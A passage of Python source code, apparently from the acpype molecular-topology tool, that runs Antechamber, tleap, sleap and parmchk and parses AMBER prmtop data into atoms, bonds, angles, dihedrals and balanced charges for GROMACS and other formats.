copy2(self.absInputFile, self.tmpDir) os.chdir(self.tmpDir) exten = self.ext[1:] if self.ext == ".pdb": tmpFile = open(self.inputFile, "r") else: if exten == "mol": exten = "mdl" cmd = "%s -dr no -i %s -fi %s -o tmp -fo ac -pf y" % (self.acExe, self.inputFile, exten) self.printDebug(cmd) out = _getoutput(cmd) if not out.isspace(): self.printDebug(out) try: tmpFile = open("tmp", "r") except Exception: rmtree(self.tmpDir) raise tmpData = tmpFile.readlines() residues = set() coords = {} for line in tmpData: if "ATOM " in line or "HETATM" in line: residues.add(line[17:20]) at = line[0:17] cs = line[30:54] if cs in coords: coords[cs].append(at) else: coords[cs] = [at] # self.printDebug(coords) if len(residues) > 1: self.printError("more than one residue detected '%s'" % str(residues)) self.printError("verify your input file '%s'. Aborting ..." 
% self.inputFile) sys.exit(9) dups = "" shortd = "" longd = "" longSet = set() id_ = 0 items = list(coords.items()) ll = len(items) for item in items: id_ += 1 if len(item[1]) > 1: # if True means atoms with same coordinates for i in item[1]: dups += "%s %s\n" % (i, item[0]) # for i in xrange(0,len(data),f): # fdata += (data[i:i+f])+' ' for id2 in range(id_, ll): item2 = items[id2] c1 = list(map(float, [item[0][i : i + 8] for i in range(0, 24, 8)])) c2 = list(map(float, [item2[0][i : i + 8] for i in range(0, 24, 8)])) dist2 = distanceAA(c1, c2) if dist2 < minDist2: dist = math.sqrt(dist2) shortd += "%8.5f %s %s\n" % (dist, item[1], item2[1]) if dist2 < maxDist2: # and not longOK: longSet.add(str(item[1])) longSet.add(str(item2[1])) if str(item[1]) not in longSet and ll > 1: longd += "%s\n" % item[1] if dups: self.printError("Atoms with same coordinates in '%s'!" % self.inputFile) self.printQuoted(dups[:-1]) exit_ = True if shortd: self.printError("Atoms TOO close (< %s Ang.)" % minDist) self.printQuoted("Dist (Ang.) Atoms\n" + shortd[:-1]) exit_ = True if longd: self.printError("Atoms TOO alone (> %s Ang.)" % maxDist) self.printQuoted(longd[:-1]) exit_ = True if exit_: if self.force: self.printWarn("You chose to proceed anyway with '-f' option. GOOD LUCK!") else: self.printError("Use '-f' option if you want to proceed anyway. Aborting ...") rmtree(self.tmpDir) sys.exit(11) resname = list(residues)[0].strip() newresname = resname # To avoid resname likes: 001 (all numbers), 1e2 (sci number), ADD : reserved terms for leap leapWords = [ "_cmd_options_", "_types_", "add", "addAtomTypes", "addIons", "addIons2", "addPath", "addPdbAtomMap", "addPdbResMap", "alias", "alignAxes", "bond", "bondByDistance", "center", "charge", "check", "clearPdbAtomMap", "clearPdbResMap", "clearVariables", "combine", "copy", "createAtom", "createParmset", "createResidue", "createUnit", "crossLink", "debugOff", "debugOn", "debugStatus", "deleteBond", "deleteOffLibEntry", "deleteRestraint", "desc", "deSelect", "displayPdbAtomMap", "displayPdbResMap", "edit", "flip", "groupSelectedAtoms", "help", "impose", "list", "listOff", "loadAmberParams", "loadAmberPrep", "loadMol2", "loadOff", "loadPdb", "loadPdbUsingSeq", "logFile", "matchVariables", "measureGeom", "quit", "relax", "remove", "restrainAngle", "restrainBond", "restrainTorsion", "saveAmberParm", "saveAmberParmPert", "saveAmberParmPol", "saveAmberParmPolPert", "saveAmberPrep", "saveMol2", "saveOff", "saveOffParm", "savePdb", "scaleCharges", "select", "sequence", "set", "setBox", "solvateBox", "solvateCap", "solvateDontClip", "solvateOct", "solvateShell", "source", "transform", "translate", "verbosity", "zMatrix", ] isLeapWord = False for word in leapWords: if resname.upper().startswith(word.upper()): self.printDebug("Residue name is a reserved word: '%s'" % word.upper()) isLeapWord = True try: float(resname) self.printDebug("Residue name is a 'number': '%s'" % resname) isNumber = True except ValueError: isNumber = False if resname[0].isdigit() or isNumber or isLeapWord: newresname = "R" + resname if not resname.isalnum(): newresname = "MOL" if newresname != resname: self.printWarn( "In %s.lib, residue name will be '%s' instead of '%s' elsewhere" % (self.acBaseName, newresname, resname) ) self.resName = newresname os.chdir(localDir) self.printDebug("setResNameCheckCoords done") def readMol2TotalCharge(self, mol2File): """Reads the charges in given mol2 file and returns the total """ charge = 0.0 ll = [] cmd = "%s -dr no -i %s -fi mol2 -o tmp -fo mol2 -c wc -cf tmp.crg 
-pf y" % (self.acExe, mol2File) if self.debug: self.printMess("Debugging...") cmd = cmd.replace("-pf y", "-pf n") self.printDebug(cmd) log = _getoutput(cmd) if os.path.exists("tmp.crg"): tmpFile = open("tmp.crg", "r") tmpData = tmpFile.readlines() for line in tmpData: ll += line.split() charge = sum(map(float, ll)) if not log.isspace() and self.debug: self.printQuoted(log) self.printDebug("readMol2TotalCharge: " + str(charge)) return charge def execAntechamber(self, chargeType=None, atomType=None): """To call Antechamber and execute it Welcome to antechamber 17.3: molecular input file processor. Usage: antechamber -i input file name -fi input file format -o output file name -fo output file format -c charge method -cf charge file name -nc net molecular charge (int) -a additional file name -fa additional file format -ao additional file operation crd : only read in coordinate crg : only read in charge radius: only read in radius name : only read in atom name type : only read in atom type bond : only read in bond type -m multiplicity (2S+1), default is 1 -rn residue name, overrides input file, default is MOL -rf residue toplogy file name in prep input file, default is molecule.res -ch check file name for gaussian, default is 'molecule' -ek mopac or sqm keyword, inside quotes; overwrites previous ones -gk gaussian job keyword, inside quotes -gm gaussian memory keyword, inside quotes, such as "%mem=1000MB" -gn gaussian number of processors keyword, inside quotes, such as "%nproc=8" -gv add keyword to generate gesp file (for Gaussian 09 only) 1 : yes 0 : no, the default -ge gaussian esp file generated by iop(6/50=1), default is g09.gesp -df am1-bcc precharge flag, 2 - use sqm(default); 0 - use mopac -at atom type gaff : the default gaff2: for gaff2 (beta-version) amber: for PARM94/99/99SB bcc : bcc sybyl: sybyl -du fix duplicate atom names: yes(y)[default] or no(n) -bk component/block Id, for ccif -an adjust atom names: yes(y) or no(n) the default is 'y' for 'mol2' and 'ac' and 'n' for the other formats -j atom type and bond type prediction index, default is 4 0 : no assignment 1 : atom type 2 : full bond types 3 : part bond types 4 : atom and full bond type 5 : atom and part bond type -s status information: 0(brief), 1(default) or 2(verbose) -eq equalizing atomic charge, default is 1 for '-c resp' and '-c bcc' and 0 for the other chrg mthds 0 : no use 1 : by atomic paths 2 : by atomic paths and structural information, i.e. E/Z configurations -pf remove intermediate files: yes(y) or no(n)[default] -pl maximum path length to determin equivalence of atomic charges for resp and bcc, the smaller the value, the faster the algorithm, default is -1 (use full length), set this parameter to 10 to 30 if your molecule is big (# atoms >= 100) -dr acdoctor mode: yes(y)[default] or no(n) -i -o -fi and -fo must appear; others are optional Use 'antechamber -L' to list the supported file formats and charge methods List of the File Formats file format type abbre. index | file format type abbre. 
index -------------------------------------------------------------- Antechamber ac 1 | Sybyl Mol2 mol2 2 PDB pdb 3 | Modified PDB mpdb 4 AMBER PREP (int) prepi 5 | AMBER PREP (car) prepc 6 Gaussian Z-Matrix gzmat 7 | Gaussian Cartesian gcrt 8 Mopac Internal mopint 9 | Mopac Cartesian mopcrt 10 Gaussian Output gout 11 | Mopac Output mopout 12 Alchemy alc 13 | CSD csd 14 MDL mdl 15 | Hyper hin 16 AMBER Restart rst 17 | Jaguar Cartesian jcrt 18 Jaguar Z-Matrix jzmat 19 | Jaguar Output jout 20 Divcon Input divcrt 21 | Divcon Output divout 22 SQM Input sqmcrt 23 | SQM Output sqmout 24 Charmm charmm 25 | Gaussian ESP gesp 26 Component cif ccif 27 | -------------------------------------------------------------- AMBER restart file can only be read in as additional file. List of the Charge Methods charge method abbre. index | charge method abbre. index -------------------------------------------------------------- RESP resp 1 | AM1-BCC bcc 2 CM1 cm1 3 | CM2 cm2 4 ESP (Kollman) esp 5 | Mulliken mul 6 Gasteiger gas 7 | Read in charge rc 8 Write out charge wc 9 | Delete Charge dc 10 -------------------------------------------------------------- """ global pid self.printMess("Executing Antechamber...") self.makeDir() ct = chargeType or self.chargeType at = atomType or self.atomType if "amber2" in at: at = "amber" if ct == "user": ct = "" else: ct = "-c %s" % ct exten = self.ext[1:] if exten == "mol": exten = "mdl" cmd = "%s -dr no -i %s -fi %s -o %s -fo mol2 %s -nc %s -m %s -s 2 -df %s -at %s -pf y %s" % ( self.acExe, self.inputFile, exten, self.acMol2FileName, ct, self.chargeVal, self.multiplicity, self.qFlag, at, self.ekFlag, ) if self.debug: self.printMess("Debugging...") cmd = cmd.replace("-pf y", "-pf n") self.printDebug(cmd) if os.path.exists(self.acMol2FileName) and not self.force: self.printMess("AC output file present... doing nothing") else: try: os.remove(self.acMol2FileName) except Exception: pass signal.signal(signal.SIGALRM, self.signal_handler) signal.alarm(self.timeTol) p = sub.Popen(cmd, shell=True, stderr=sub.STDOUT, stdout=sub.PIPE) pid = p.pid out = str(p.communicate()[0].decode()) # p.stdout.read() self.acLog = out if os.path.exists(self.acMol2FileName): self.printMess("* Antechamber OK *") else: self.printQuoted(self.acLog) return True return False def signal_handler(self, _signum, _frame): # , pid = 0): """Signal handler""" global pid pids = job_pids_family(pid) self.printDebug("PID: %s, PIDS: %s" % (pid, pids)) self.printMess("Timed out! Process %s killed, max exec time (%ss) exceeded" % (pids, self.timeTol)) # os.system('kill -15 %s' % pids) for i in pids.split(): os.kill(int(i), 15) raise Exception("Semi-QM taking too long to finish... 
aborting!") def delOutputFiles(self): """Delete temporary output files""" delFiles = [ "mopac.in", "tleap.in", "sleap.in", "fixbo.log", "addhs.log", "ac_tmp_ot.mol2", "frcmod.ac_tmp", "fragment.mol2", self.tmpDir, ] # , 'divcon.pdb', 'mopac.pdb', 'mopac.out'] #'leap.log' self.printMess("Removing temporary files...") for file_ in delFiles: file_ = os.path.join(self.absHomeDir, file_) if os.path.exists(file_): if os.path.isdir(file_): rmtree(file_) else: os.remove(file_) def checkXyzAndTopFiles(self): """Cehck XYZ and TOP files""" fileXyz = self.acXyzFileName fileTop = self.acTopFileName if os.path.exists(fileXyz) and os.path.exists(fileTop): # self.acXyz = fileXyz # self.acTop = fileTop return True return False def execSleap(self): """Execute sleap""" global pid self.makeDir() if self.ext == ".mol2": self.printWarn("Sleap doesn't work with mol2 files yet...") return True if self.chargeType != "bcc": self.printWarn("Sleap works only with bcc charge method") return True if self.atomType != "gaff": self.printWarn("Sleap works only with gaff atom type") return True sleapScpt = SLEAP_TEMPLATE % self.acParDict fp = open("sleap.in", "w") fp.write(sleapScpt) fp.close() cmd = "%s -f sleap.in" % self.sleapExe if self.checkXyzAndTopFiles() and not self.force: self.printMess("Topologies files already present... doing nothing") else: try: os.remove(self.acTopFileName) os.remove(self.acXyzFileName) except Exception: pass self.printMess("Executing Sleap...") self.printDebug(cmd) p = sub.Popen(cmd, shell=True, stderr=sub.STDOUT, stdout=sub.PIPE) pid = p.pid signal.signal(signal.SIGALRM, self.signal_handler) signal.alarm(self.timeTol) out = str(p.communicate()[0].decode()) # p.stdout.read() self.sleapLog = out self.checkLeapLog(self.sleapLog) if self.checkXyzAndTopFiles(): self.printMess(" * Sleap OK *") else: self.printQuoted(self.sleapLog) return True return False def execTleap(self): """Execute tleap""" fail = False self.makeDir() if self.ext == ".pdb": self.printMess("... converting pdb input file to mol2 input file") if self.convertPdbToMol2(): self.printError("convertPdbToMol2 failed") # print self.chargeVal if self.execAntechamber(): self.printError("Antechamber failed") fail = True if self.execParmchk(): self.printError("Parmchk failed") fail = True if fail: return True tleapScpt = TLEAP_TEMPLATE % self.acParDict fp = open("tleap.in", "w") fp.write(tleapScpt) fp.close() cmd = "%s -f tleap.in" % self.tleapExe if self.checkXyzAndTopFiles() and not self.force: self.printMess("Topologies files already present... doing nothing") else: try: os.remove(self.acTopFileName) os.remove(self.acXyzFileName) except Exception: pass self.printMess("Executing Tleap...") self.printDebug(cmd) self.tleapLog = _getoutput(cmd) self.checkLeapLog(self.tleapLog) if self.checkXyzAndTopFiles(): self.printMess("* Tleap OK *") else: self.printQuoted(self.tleapLog) return True return False def checkLeapLog(self, log): """Check Leap log""" log = log.splitlines(True) check = "" block = False for line in log: # print "*"+line+"*" if "Checking '" in line: # check += line block = True if "Checking Unit." 
in line: block = False if block: check += line self.printQuoted(check[:-1]) def locateDat(self, aFile): """locate a file pertinent to $AMBERHOME/dat/leap/parm/""" amberhome = os.environ.get("AMBERHOME") if amberhome: aFileF = os.path.join(amberhome, "dat/leap/parm", aFile) if os.path.exists(aFileF): return aFileF aFileF = os.path.join(os.path.dirname(self.acExe), "../dat/leap/parm", aFile) if os.path.exists(aFileF): return aFileF return None def execParmchk(self): """Execute parmchk""" self.makeDir() cmd = "%s -i %s -f mol2 -o %s" % (self.parmchkExe, self.acMol2FileName, self.acFrcmodFileName) if "amber" in self.atomType: gaffFile = self.locateDat(self.gaffDatfile) parmfile = self.locateDat("parm10.dat") frcmodffxxSB = self.locateDat("frcmod.ff14SB") # frcmodparmbsc0 = self.locateDat('frcmod.parmbsc0') parmGaffFile = parmMerge(parmfile, gaffFile) parmGaffffxxSBFile = parmMerge(parmGaffFile, frcmodffxxSB, frcmod=True) # parm99gaffff99SBparmbsc0File = parmMerge(parm99gaffff99SBFile, frcmodparmbsc0, frcmod = True) # parm10file = self.locateDat('parm10.dat') # PARM99 + frcmod.ff99SB + frcmod.parmbsc0 in AmberTools 1.4 cmd += " -p %s" % parmGaffffxxSBFile # Ignoring BSC0 elif "gaff2" in self.atomType: cmd += " -s 2" self.parmchkLog = _getoutput(cmd) self.printDebug(cmd) if os.path.exists(self.acFrcmodFileName): check = self.checkFrcmod() if check: self.printWarn("Couldn't determine all parameters:") self.printMess("From file '%s'\n" % self.acFrcmodFileName + check) else: self.printMess("* Parmchk OK *") else: self.printQuoted(self.parmchkLog) return True return False def checkFrcmod(self): """Check FRCMOD file""" check = "" frcmodContent = open(self.acFrcmodFileName, "r").readlines() for line in frcmodContent: if "ATTN, need revision" in line: check += line return check def convertPdbToMol2(self): """Convert PDB to MOL2 by using babel""" if self.ext == ".pdb": if self.execBabel(): self.printError("convert pdb to mol2 via babel failed") return True return False def execBabel(self): """Execute babel""" self.makeDir() cmd = "%s -ipdb %s -omol2 -O %s.mol2" % (self.babelExe, self.inputFile, self.baseName) self.printDebug(cmd) self.babelLog = _getoutput(cmd) self.ext = ".mol2" self.inputFile = self.baseName + self.ext self.acParDict["ext"] = "mol2" if os.path.exists(self.inputFile): self.printMess("* Babel OK *") else: self.printQuoted(self.babelLog) return True return False def makeDir(self): """Make Dir""" os.chdir(self.rootDir) self.absHomeDir = os.path.abspath(self.homeDir) if not os.path.exists(self.homeDir): os.mkdir(self.homeDir) os.chdir(self.homeDir) copy2(self.absInputFile, ".") return True def createACTopol(self): """ If successful, Amber Top and Xyz files will be generated """ # sleap = False if self.engine == "sleap": if self.execSleap(): self.printError("Sleap failed") self.printMess("... trying Tleap") if self.execTleap(): self.printError("Tleap failed") if self.engine == "tleap": if self.execTleap(): self.printError("Tleap failed") if self.extOld == ".pdb": self.printMess("... 
trying Sleap") self.ext = self.extOld self.inputFile = self.baseName + self.ext if self.execSleap(): self.printError("Sleap failed") if not self.debug: self.delOutputFiles() def createMolTopol(self): """ Create molTop obj """ self.topFileData = open(self.acTopFileName, "r").readlines() self.molTopol = MolTopol( self, verbose=self.verbose, debug=self.debug, gmx4=self.gmx4, disam=self.disam, direct=self.direct, is_sorted=self.sorted, chiral=self.chiral, ) if self.outTopols: if "cns" in self.outTopols: self.molTopol.writeCnsTopolFiles() if "gmx" in self.outTopols: self.molTopol.writeGromacsTopolFiles() if "charmm" in self.outTopols: self.writeCharmmTopolFiles() self.pickleSave() def pickleSave(self): """ To restore: from acpype import * #import cPickle as pickle import pickle o = pickle.load(open('DDD.pkl','rb')) NB: It fails to restore with ipython in Mac (Linux OK) """ pklFile = self.baseName + ".pkl" dumpFlag = False if not os.path.exists(pklFile): mess = "Writing pickle file %s" % pklFile dumpFlag = True elif self.force: mess = "Overwriting pickle file %s" % pklFile dumpFlag = True else: mess = "Pickle file %s already present... doing nothing" % pklFile self.printMess(mess) if dumpFlag: with open(pklFile, "wb") as f: # for python 3.3 or higher pickle.dump(self, f) def getFlagData(self, flag): """ For a given acFileTop flag, return a list of the data related """ block = False tFlag = "%FLAG " + flag data = "" if not self.topFileData: raise Exception("PRMTOP file empty?") for rawLine in self.topFileData: if "%COMMENT" in rawLine: continue line = rawLine.replace("\r", "").replace("\n", "") if tFlag in line: block = True continue if block and "%FLAG " in line: break if block: if "%FORMAT" in line: line = line.strip().strip("%FORMAT()").split(".")[0] for c in line: if c.isalpha(): f = int(line.split(c)[1]) break continue data += line # data need format sdata = [data[i : i + f].strip() for i in range(0, len(data), f)] if "+" and "." in data and flag != "RESIDUE_LABEL": # it's a float ndata = list(map(float, sdata)) elif flag != "RESIDUE_LABEL": try: # try if it's integer ndata = list(map(int, sdata)) except Exception: ndata = sdata else: ndata = sdata if flag == "AMBER_ATOM_TYPE": nn = [] ll = set() prefixed = False for ii in ndata: prefixed = True if ii[0].isdigit(): ll.add(ii) ii = "A" + ii nn.append(ii) if prefixed and ll: self.printDebug("GMX does not like atomtype starting with Digit") self.printDebug("prefixing AtomType %s with 'A'." % list(ll)) ndata = nn return ndata # a list def getResidueLabel(self): """ Get a 3 capital letters code from acFileTop Returns a list. """ residueLabel = self.getFlagData("RESIDUE_LABEL") residueLabel = list(map(str, residueLabel)) if residueLabel[0] != residueLabel[0].upper(): self.printWarn("residue label '%s' in '%s' is not all UPPERCASE" % (residueLabel[0], self.inputFile)) self.printWarn("this may raise problem with some applications like CNS") self.residueLabel = residueLabel def getCoords(self): """ For a given acFileXyz file, return a list of coords as: [[x1,y1,z1],[x2,y2,z2], etc.] 
""" if not self.xyzFileData: raise Exception("INPCRD file empty?") data = "" for rawLine in self.xyzFileData[2:]: line = rawLine.replace("\r", "").replace("\n", "") data += line ll = len(data) ndata = list(map(float, [data[i : i + 12] for i in range(0, ll, 12)])) gdata = [] for i in range(0, len(ndata), 3): gdata.append([ndata[i], ndata[i + 1], ndata[i + 2]]) self.printDebug("getCoords done") return gdata def getAtoms(self): """ Set a list with all atoms objects build from dat in acFileTop Set also if molTopol atom type system is gaff or amber Set also list atomTypes Set also resid Set also molTopol total charge """ atomNameList = self.getFlagData("ATOM_NAME") atomTypeNameList = self.getFlagData("AMBER_ATOM_TYPE") self._atomTypeNameList = atomTypeNameList massList = self.getFlagData("MASS") chargeList = self.getFlagData("CHARGE") # totalCharge = sum(chargeList) # self.printDebug('charge to be balanced: total %13.10f' % (totalCharge/qConv)) resIds = self.getFlagData("RESIDUE_POINTER") + [0] # to guess the resId of the last residue before ion or water # for resTemp in self.residueLabel: # if resTemp in ionOrWaterResNameList: # lastSoluteResId = self.residueLabel.index(resTemp) - 1 # break # print lastSoluteResId, self.residueLabel[lastSoluteResId] # uniqAtomTypeId = self.getFlagData('ATOM_TYPE_INDEX') # for LJ # balanceChargeList = self.balanceCharges(chargeList) coords = self.getCoords() ACOEFs, BCOEFs = self.getABCOEFs() atoms = [] atomTypes = [] tmpList = [] # a list with unique atom types totalCharge = 0.0 countRes = 0 id_ = 0 FirstNonSoluteId = None for atomName in atomNameList: if atomName != atomName.upper(): self.printDebug("atom name '%s' HAS to be all UPPERCASE... Applying this here." % atomName) atomName = atomName.upper() atomTypeName = atomTypeNameList[id_] if id_ + 1 == resIds[countRes]: resid = countRes # self.residueLabel[countRes] countRes += 1 resName = self.residueLabel[resid] if resName in ionOrSolResNameList and not FirstNonSoluteId: FirstNonSoluteId = id_ # print id_, resid, resName mass = massList[id_] # charge = balanceChargeList[id_] charge = chargeList[id_] chargeConverted = charge / qConv totalCharge += charge coord = coords[id_] ACOEF = ACOEFs[id_] BCOEF = BCOEFs[id_] atomType = AtomType(atomTypeName, mass, ACOEF, BCOEF) if atomTypeName not in tmpList: tmpList.append(atomTypeName) atomTypes.append(atomType) atom = Atom(atomName, atomType, id_ + 1, resid, mass, chargeConverted, coord) atoms.append(atom) id_ += 1 balanceChargeList, balanceValue, balanceIds = self.balanceCharges(chargeList, FirstNonSoluteId) for id_ in balanceIds: atoms[id_].charge = balanceValue / qConv # self.printDebug("atom ids and balanced charges: %s, %3f10" % (balanceIds, balanceValue/qConv)) if atomTypeName[0].islower(): self.atomTypeSystem = "gaff" else: self.atomTypeSystem = "amber" self.printDebug("Balanced TotalCharge %13.10f" % float(sum(balanceChargeList) / qConv)) self.totalCharge = int(totalCharge) self.atoms = atoms self.atomTypes = atomTypes self.pbc = None if len(coords) == len(atoms) + 2 or len(coords) == len(atoms) * 2 + 2: self.pbc = [coords[-2], coords[-1]] self.printDebug("PBC = %s" % self.pbc) self.printDebug("getAtoms done") def getBonds(self): """Get Bonds""" uniqKbList = self.getFlagData("BOND_FORCE_CONSTANT") uniqReqList = self.getFlagData("BOND_EQUIL_VALUE") bondCodeHList = self.getFlagData("BONDS_INC_HYDROGEN") bondCodeNonHList = self.getFlagData("BONDS_WITHOUT_HYDROGEN") bondCodeList = bondCodeHList + bondCodeNonHList bonds = [] for i in range(0, len(bondCodeList), 3): 
idAtom1 = bondCodeList[i] // 3 # remember python starts with id 0 idAtom2 = bondCodeList[i + 1] // 3 bondTypeId = bondCodeList[i + 2] - 1 atom1 = self.atoms[idAtom1] atom2 = self.atoms[idAtom2] kb = uniqKbList[bondTypeId] req = uniqReqList[bondTypeId] atoms = [atom1, atom2] bond = Bond(atoms, kb, req) bonds.append(bond) self.bonds = bonds self.printDebug("getBonds done") def getAngles(self): """Get Angles""" uniqKtList = self.getFlagData("ANGLE_FORCE_CONSTANT") uniqTeqList = self.getFlagData("ANGLE_EQUIL_VALUE") # for list below, true atom number = index/3 + 1 angleCodeHList = self.getFlagData("ANGLES_INC_HYDROGEN") angleCodeNonHList = self.getFlagData("ANGLES_WITHOUT_HYDROGEN") angleCodeList = angleCodeHList + angleCodeNonHList angles = [] for i in range(0, len(angleCodeList), 4): idAtom1 = angleCodeList[i] // 3 # remember python starts with id 0 idAtom2 = angleCodeList[i + 1] // 3 idAtom3 = angleCodeList[i + 2] // 3 angleTypeId = angleCodeList[i + 3] - 1 atom1 = self.atoms[idAtom1] atom2 = self.atoms[idAtom2] atom3 = self.atoms[idAtom3] kt = uniqKtList[angleTypeId] teq = uniqTeqList[angleTypeId] # angle given in rad in prmtop atoms = [atom1, atom2, atom3] angle = Angle(atoms, kt, teq) angles.append(angle) self.angles = angles self.printDebug("getAngles done") def getDihedrals(self): """ Get dihedrals (proper and imp), condensed list of prop dih and atomPairs """ uniqKpList = self.getFlagData("DIHEDRAL_FORCE_CONSTANT") uniqPeriodList = self.getFlagData("DIHEDRAL_PERIODICITY") uniqPhaseList = self.getFlagData("DIHEDRAL_PHASE") # for list below, true atom number = abs(index)/3 + 1 dihCodeHList = self.getFlagData("DIHEDRALS_INC_HYDROGEN") dihCodeNonHList = self.getFlagData("DIHEDRALS_WITHOUT_HYDROGEN") dihCodeList = dihCodeHList + dihCodeNonHList properDih = [] improperDih = [] condProperDih = [] # list of dihedrals condensed by the same quartet # atomPairs = [] atomPairs = set() for i in range(0, len(dihCodeList), 5): idAtom1 = dihCodeList[i] // 3 # remember python starts with id 0 idAtom2 = dihCodeList[i + 1] // 3 # 3 and 4 indexes can be negative: if id3 < 0, end group interations # in amber are to be ignored; if id4 < 0, dihedral is improper idAtom3raw = dihCodeList[i + 2] // 3 # can be negative -> exclude from 1-4vdw idAtom4raw = dihCodeList[i + 3] // 3 # can be negative -> Improper idAtom3 = abs(idAtom3raw) idAtom4 = abs(idAtom4raw) dihTypeId = dihCodeList[i + 4] - 1 atom1 = self.atoms[idAtom1] atom2 = self.atoms[idAtom2] atom3 = self.atoms[idAtom3] atom4 = self.atoms[idAtom4] kPhi = uniqKpList[dihTypeId] # already divided by IDIVF period = int(uniqPeriodList[dihTypeId]) # integer phase = uniqPhaseList[dihTypeId] # angle given in rad in prmtop if phase == kPhi == 0: period = 0 # period is set to 0 atoms = [atom1, atom2, atom3, atom4] dihedral = Dihedral(atoms, kPhi, period, phase) if idAtom4raw > 0: try: atomsPrev = properDih[-1].atoms except Exception: atomsPrev = [] properDih.append(dihedral) if idAtom3raw < 0 and atomsPrev == atoms: condProperDih[-1].append(dihedral) else: condProperDih.append([dihedral]) pair = (atom1, atom4) # if atomPairs.count(pair) == 0 and idAtom3raw > 0: if idAtom3raw > 0: atomPairs.add(pair) else: improperDih.append(dihedral) try: atomPairs = sorted(atomPairs) except Exception: pass self.properDihedrals = properDih self.improperDihedrals = improperDih self.condensedProperDihedrals = condProperDih # [[],[],...] self.atomPairs = atomPairs # set((atom1, atom2), ...) 
self.printDebug("getDihedrals done") def getChirals(self): """ Get chiral atoms, its 4 neighbours and improper dihedral angle """ self.chiralGroups = [] if self.obchiralExe: # print (self.obchiralExe, os.getcwd()) cmd = "%s %s" % (self.obchiralExe, self.inputFile) # print(cmd) out = map(int, re.findall(r"Atom (\d+) Is", _getoutput(cmd))) # print("*%s*" % out) chiralGroups = [] for id_ in out: atChi = self.atoms[id_ - 1] quad = [] for bb in self.bonds: bAts = bb.atoms[:] if atChi in bAts: bAts.remove(atChi) quad.append(bAts[0]) if len(quad) != 4: if self.chiral: self.printWarn( "Atom %s has less than 4 connections to 4 different atoms. It's NOT Chiral!" % atChi ) continue v1, v2, v3, v4 = [x.coords for x in quad] chiralGroups.append((atChi, quad, imprDihAngle(v1, v2, v3, v4))) self.chiralGroups = chiralGroups def sortAtomsForGromacs(self): """ Re-sort atoms for gromacs, which expects all hydrogens to immediately follow the heavy atom they are bonded to and belong to the same charge group. Currently, atom mass < 1.2 is taken to denote a proton. This behavior may be changed by modifying the 'is_hydrogen' function within. JDC 2011-02-03 """ # Build dictionary of bonded atoms. bonded_atoms = dict() for atom in self.atoms: bonded_atoms[atom] = list() for bond in self.bonds: [atom1, atom2] = bond.atoms bonded_atoms[atom1].append(atom2) bonded_atoms[atom2].append(atom1) # Define hydrogen and heavy atom classes. def is_hydrogen(atom): """Check for H""" return atom.mass < 1.2 def is_heavy(atom): """Check for non H""" return not is_hydrogen(atom) # Build list of sorted atoms, assigning charge groups by heavy atom. sorted_atoms = list() cgnr = 1 # charge group number: each heavy atoms is assigned its own charge group # First pass: add heavy atoms, followed by the hydrogens bonded to them. for atom in self.atoms: if is_heavy(atom): # Append heavy atom. atom.cgnr = cgnr sorted_atoms.append(atom) # Append all hydrogens. for bonded_atom in bonded_atoms[atom]: if is_hydrogen(bonded_atom) and bonded_atom not in sorted_atoms: # Append bonded hydrogen. bonded_atom.cgnr = cgnr sorted_atoms.append(bonded_atom) cgnr += 1 # Second pass: Add any remaining atoms. if len(sorted_atoms) < len(self.atoms): for atom in self.atoms: if atom not in sorted_atoms: atom.cgnr = cgnr sorted_atoms.append(atom) cgnr += 1 # Replace current list of atoms with sorted list. self.atoms = sorted_atoms # Renumber atoms in sorted list, starting from 1. for (index, atom) in enumerate(self.atoms): atom.id = index + 1 def setAtomPairs(self): """ Set a list of pair of atoms pertinent to interaction 1-4 for vdw. WRONG: Deprecated """ atomPairs = [] for item in self.condensedProperDihedrals: dih = item[0] atom1 = dih.atoms[0] atom2 = dih.atoms[3] pair = [atom1, atom2] if atomPairs.count(pair) == 0: atomPairs.append(pair) self.atomPairs = atomPairs # [[atom1, atom2], ...] self.printDebug("atomPairs done") def getExcludedAtoms(self): """ Returns a list of atoms with a list of its excluded atoms up to 3rd neighbour. It's implicitly indexed, i.e., a sequence of atoms in position n in the excludedAtomsList corresponds to atom n (self.atoms) and so on. 
NOT USED """ excludedAtomsIdList = self.getFlagData("EXCLUDED_ATOMS_LIST") numberExcludedAtoms = self.getFlagData("NUMBER_EXCLUDED_ATOMS") atoms = self.atoms interval = 0 excludedAtomsList = [] for number in numberExcludedAtoms: temp = excludedAtomsIdList[interval : interval + number] if temp == [0]: excludedAtomsList.append([]) else: excludedAtomsList.append([atoms[a - 1] for a in temp]) interval += number self.excludedAtoms = excludedAtomsList self.printDebug("getExcludedAtoms") def balanceCharges(self, chargeList, FirstNonSoluteId=None): """ Note that python is very annoying about floating points. Even after balance, there will always be some residue of order e-12 to e-16, which is believed to vanished once one writes a topology file, say, for CNS or GMX, where floats are represented with 4 or 5 maximum decimals. """ limIds = [] # self.printDebug(chargeList) total = sum(chargeList) totalConverted = total / qConv self.printDebug("charge to be balanced: total %13.10f" % (totalConverted)) maxVal = max(chargeList[:FirstNonSoluteId]) minVal = min(chargeList[:FirstNonSoluteId]) if abs(maxVal) >= abs(minVal): lim = maxVal else: lim = minVal nLims = chargeList.count(lim) # limId = chargeList.index(lim) diff = totalConverted - round(totalConverted) fix = lim - diff * qConv / nLims id_ = 0 for c in chargeList: if c == lim: limIds.append(id_) chargeList[id_] = fix id_ += 1 # self.printDebug(chargeList) self.printDebug("balanceCharges done") return chargeList, fix, limIds def getABCOEFs(self): """Get non-bonded coeficients""" uniqAtomTypeIdList = self.getFlagData("ATOM_TYPE_INDEX") nonBonIdList = self.getFlagData("NONBONDED_PARM_INDEX") rawACOEFs = self.getFlagData("LENNARD_JONES_ACOEF") rawBCOEFs = self.getFlagData("LENNARD_JONES_BCOEF") # print nonBonIdList, len(nonBonIdList), rawACOEFs, len(rawACOEFs) ACOEFs = [] BCOEFs = [] ntypes = max(uniqAtomTypeIdList) # id_ = 0 # for atName in self._atomTypeNameList: for id_ in range(len(self._atomTypeNameList)): # id_ = self._atomTypeNameList.index(atName) atomTypeId = uniqAtomTypeIdList[id_] index = ntypes * (atomTypeId - 1) + atomTypeId nonBondId = nonBonIdList[index - 1] # print "*****", index, ntypes, atName, id_, atomTypeId, nonBondId ACOEFs.append(rawACOEFs[nonBondId - 1]) BCOEFs.append(rawBCOEFs[nonBondId - 1]) # id_ += 1 # print ACOEFs self.printDebug("getABCOEFs done") return ACOEFs, BCOEFs def setProperDihedralsCoef(self): """ It takes self.condensedProperDihedrals and returns self.properDihedralsCoefRB, a reduced list of quartet atoms + RB. Coeficients ready for GMX (multiplied by 4.184) 